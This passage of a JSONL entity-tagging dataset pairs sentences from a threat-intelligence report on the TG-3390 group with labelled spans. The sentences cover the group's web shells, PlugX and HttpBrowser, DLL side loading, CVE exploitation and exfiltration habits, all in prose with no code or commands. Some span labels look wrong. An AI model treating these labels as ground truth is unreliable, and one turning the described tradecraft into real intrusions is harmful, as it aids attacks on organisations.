nbtscan \u2014 scans NetBIOS name servers .", "spans": [{"start": 0, "end": 25, "label": "System"}, {"start": 28, "end": 31, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 111, "end": 117, "label": "System"}, {"start": 155, "end": 162, "label": "System"}, {"start": 171, "end": 178, "label": "System"}]} {"text": "CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 34, "end": 41, "label": "Organization"}]} {"text": "As discussed in the Actions on objectives section , the threat actors appear to wait until they have established a foothold .", "spans": []} {"text": "TG-3390 actors use command and control ( C2 ) domains for extended periods of time but frequently change the domains' IP addresses .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 19, "end": 38, "label": "System"}, {"start": 41, "end": 43, "label": "System"}]} {"text": "The new IP addresses are typically on the same subnet as the previous ones .", "spans": []} {"text": "TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 30, "end": 32, "label": "System"}]} {"text": "The most common registrar used by the adversary is HiChina Zhicheng Technology Ltd .", "spans": [{"start": 51, "end": 82, "label": "Organization"}]} {"text": "The threat actors have a demonstrated ability to move from one network provider to another , using some infrastructure for extended periods of time and other domains for only a few days .", "spans": []} {"text": "Seemingly random activity patterns in infrastructure deployment and usage , along with the ability to use a wide variety of geographically diverse infrastructure , help the threat actors avoid detection .", "spans": []} {"text": "TG-3390 SWCs may be largely geographically independent , but 
the group's most frequently used C2 registrars and IP net blocks are located in the U.S. Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 8, "end": 12, "label": "System"}, {"start": 94, "end": 96, "label": "System"}, {"start": 169, "end": 171, "label": "System"}, {"start": 227, "end": 234, "label": "Organization"}]} {"text": "The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": [{"start": 25, "end": 30, "label": "Malware"}, {"start": 31, "end": 34, "label": "System"}, {"start": 40, "end": 47, "label": "System"}]} {"text": "The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": [{"start": 45, "end": 48, "label": "Organization"}]} {"text": "The OwaAuth web shell is likely created with a builder , given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 12, "end": 21, "label": "System"}, {"start": 72, "end": 74, "label": "System"}]} {"text": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 141, "end": 151, "label": "System"}]} {"text": "TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 21, "label": "System"}, {"start": 45, "end": 51, "label": "System"}, {"start": 57, "end": 60, "label": "System"}]} {"text": "The ZIP archives have names relevant to the targets and contain 
both legitimate files and malware .", "spans": [{"start": 4, "end": 7, "label": "System"}]} {"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets , and an HttpBrowser installer disguised as an image file .", "spans": [{"start": 31, "end": 34, "label": "Organization"}, {"start": 70, "end": 73, "label": "System"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 140, "end": 149, "label": "System"}]} {"text": "Both the redirect code on the compromised site and the exploit code appear and disappear , indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations .", "spans": [{"start": 167, "end": 170, "label": "System"}]} {"text": "The threat actors have evolved to whitelisting IP addresses and only delivering the exploit and payload to specific targets of interest .", "spans": [{"start": 47, "end": 49, "label": "Indicator"}]} {"text": "CTU researchers have observed TG-3390 compromising a target organization's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}, {"start": 132, "end": 135, "label": "System"}]} {"text": "TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 25, "end": 29, "label": "System"}, {"start": 30, "end": 38, "label": "System"}, {"start": 48, "end": 52, "label": "System"}]} {"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HttpBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to 
redirect users' web browsers to exploit code .", "spans": [{"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 67, "end": 80, "label": "System"}, {"start": 88, "end": 92, "label": "System"}, {"start": 93, "end": 112, "label": "System"}, {"start": 130, "end": 141, "label": "Malware"}, {"start": 142, "end": 150, "label": "System"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 175, "end": 188, "label": "System"}, {"start": 192, "end": 197, "label": "System"}]} {"text": "In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": [{"start": 24, "end": 27, "label": "Organization"}, {"start": 42, "end": 49, "label": "Organization"}, {"start": 63, "end": 69, "label": "System"}, {"start": 132, "end": 135, "label": "System"}]} {"text": "Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure .", "spans": [{"start": 0, "end": 6, "label": "System"}]} {"text": "TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 13, "end": 16, "label": "System"}, {"start": 141, "end": 144, "label": "System"}]} {"text": "CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 69, "end": 78, "label": "Organization"}]} {"text": "The DLL acts as a stub loader , which loads and executes the shell code .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 23, "end": 29, "label": "System"}]} {"text": "The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system .", "spans": [{"start": 50, "end": 55, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}]} {"text": 
"Note : DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors .", "spans": [{"start": 7, "end": 10, "label": "System"}, {"start": 99, "end": 108, "label": "System"}]} {"text": "The challenge is detecting known good software loading and running malware .", "spans": []} {"text": "As security controls have improved , DLL side loading has evolved to load a payload stored in a different directory or from a registry value .", "spans": [{"start": 37, "end": 40, "label": "System"}]} {"text": "In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": [{"start": 38, "end": 48, "label": "System"}]} {"text": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 41, "end": 50, "label": "System"}, {"start": 54, "end": 62, "label": "System"}, {"start": 93, "end": 105, "label": "System"}]} {"text": "The IIS w3wp.exe process loads the malicious DLL , which CTU researchers have observed in the Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Bin directory .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 8, "end": 16, "label": "Indicator"}, {"start": 45, "end": 48, "label": "System"}, {"start": 57, "end": 60, "label": "Organization"}]} {"text": "To traverse the firewall , C2 traffic for most TG-3390 tools occurs over ports 53 , 80 , and 443 .", "spans": [{"start": 16, "end": 24, "label": "System"}, {"start": 27, "end": 29, "label": "System"}, {"start": 47, "end": 54, "label": "Organization"}]} {"text": "The PlugX malware can be configured to use HTTP , DNS , raw TCP , or UDP to avoid network-based detection .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 43, "end": 47, "label": "Indicator"}, 
{"start": 50, "end": 53, "label": "Indicator"}, {"start": 60, "end": 63, "label": "Indicator"}, {"start": 69, "end": 72, "label": "Indicator"}]} {"text": "In one sample analyzed by CTU researchers , PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 44, "end": 49, "label": "Malware"}]} {"text": "Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications .", "spans": [{"start": 6, "end": 17, "label": "Malware"}, {"start": 31, "end": 34, "label": "Indicator"}]} {"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1 , which is a variation of a technique known as \" parking \" .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 37, "end": 39, "label": "System"}, {"start": 83, "end": 85, "label": "Indicator"}, {"start": 94, "end": 103, "label": "Indicator"}]} {"text": "Other variations of parking point the IP address to Google 's recursive name server 8.8.8.8 , an address belonging to Confluence , or to other non-routable addresses .", "spans": [{"start": 38, "end": 40, "label": "Indicator"}, {"start": 52, "end": 58, "label": "Organization"}]} {"text": "When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": [{"start": 86, "end": 88, "label": "System"}]} {"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 55, "end": 62, "label": "Organization"}]} {"text": "After compromising an initial victim's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim's organization name .", "spans": [{"start": 88, "end": 93, "label": 
"Organization"}]} {"text": "They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": [{"start": 23, "end": 31, "label": "System"}, {"start": 66, "end": 73, "label": "Malware"}, {"start": 74, "end": 83, "label": "System"}]} {"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , the adversaries identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": [{"start": 7, "end": 14, "label": "Malware"}, {"start": 15, "end": 24, "label": "System"}, {"start": 176, "end": 188, "label": "Malware"}, {"start": 189, "end": 199, "label": "System"}]} {"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": []} {"text": "The threat actors use the Hunter and nbtscan tools , sometimes renamed , to conduct network reconnaissance for vulnerable servers and online systems .", "spans": [{"start": 26, "end": 32, "label": "System"}, {"start": 37, "end": 44, "label": "System"}]} {"text": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 21, "end": 27, "label": "Indicator"}]} {"text": "Over a few days' span , the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance .", "spans": []} {"text": "They use At.exe to schedule tasks to run self-extracting RAR archives , which install either HttpBrowser or PlugX .", "spans": [{"start": 9, "end": 15, "label": "Indicator"}, {"start": 57, "end": 60, "label": "System"}, {"start": 93, "end": 104, "label": "Malware"}, {"start": 108, "end": 113, "label": "Malware"}]} {"text": "CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN .", "spans": [{"start": 0, "end": 3, "label": 
"Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 60, "end": 63, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]} {"text": "To facilitate lateral movement , the adversaries deploy ASPXTool web shells to internally accessible systems running IIS .", "spans": [{"start": 56, "end": 64, "label": "System"}, {"start": 65, "end": 75, "label": "System"}, {"start": 117, "end": 120, "label": "System"}]} {"text": "CTU researchers have observed the threat actors encrypting data using the password \" admin-windows2014 \" and splitting the RAR archives into parts in the recycler directory , with the same name as the uncompressed data .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 123, "end": 126, "label": "System"}]} {"text": "The number at the end of the password corresponds to the year of the intrusion .", "spans": []} {"text": "For example , the password \" admin-windows2014 \" shown in Figure 14 was changed to \"admin-windows2015\" for TG-3390 intrusions conducted in 2015 .", "spans": [{"start": 107, "end": 114, "label": "Organization"}]} {"text": "CTU researchers have observed TG-3390 actors staging RAR archives , renamed with a .zip file extension , on externally accessible web servers .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}, {"start": 53, "end": 56, "label": "System"}, {"start": 83, "end": 87, "label": "Indicator"}]} {"text": "The adversaries then issue HTTP GET requests , sometimes with the User-Agent MINIXL , to exfiltrate the archive parts from the victim's network .", "spans": [{"start": 27, "end": 31, "label": "Indicator"}, {"start": 66, "end": 76, "label": "System"}, {"start": 77, "end": 83, "label": "System"}]} {"text": "Successfully evicting TG-3390 from an environment requires a coordinated plan to remove all access points , including remote access tools and web shells .", "spans": [{"start": 22, "end": 29, "label": 
"Organization"}, {"start": 118, "end": 137, "label": "System"}, {"start": 142, "end": 152, "label": "System"}]} {"text": "Within weeks of eviction , the threat actors attempt to access their ChinaChopper web shells from previously used IP addresses .", "spans": [{"start": 69, "end": 81, "label": "Malware"}, {"start": 82, "end": 92, "label": "System"}, {"start": 114, "end": 116, "label": "Indicator"}]} {"text": "Finding the web shells inaccessible , the adversaries search google.co.jp for remote access solutions .", "spans": [{"start": 12, "end": 22, "label": "System"}, {"start": 61, "end": 73, "label": "Indicator"}]} {"text": "CTU researchers discovered the threat actors searching for \" [company] login , \" which directed them to the landing page for remote access .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions , and then brute forcing usernames and passwords .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": [{"start": 69, "end": 77, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 131, "end": 138, "label": "Organization"}]} {"text": "CTU researchers believe legitimate websites are used to host tools because web proxies categorize the sites as benign .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 51, "end": 59, "label": "System"}, {"start": 60, "end": 70, "label": "System"}, 
{"start": 151, "end": 160, "label": "System"}, {"start": 173, "end": 184, "label": "Malware"}, {"start": 188, "end": 193, "label": "Malware"}]} {"text": "After reentering an environment , the threat actors focus on obtaining the active directory contents .", "spans": []} {"text": "TG-3390 is known for compromising organizations via SWCs and moving quickly to install backdoors on Exchange servers .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 52, "end": 56, "label": "System"}, {"start": 100, "end": 108, "label": "System"}]} {"text": "Despite the group's proficiency , there are still many opportunities to detect and disrupt its operation by studying its modus operandi .", "spans": []} {"text": "The threat actors work to overcome existing security controls , or those put in place during an engagement , to complete their mission of exfiltrating intellectual property .", "spans": []} {"text": "Due to TG-3390 's determination , organizations should formulate a solid eviction plan before engaging with the threat actors to prevent them from reentering the network .", "spans": [{"start": 7, "end": 14, "label": "Organization"}]}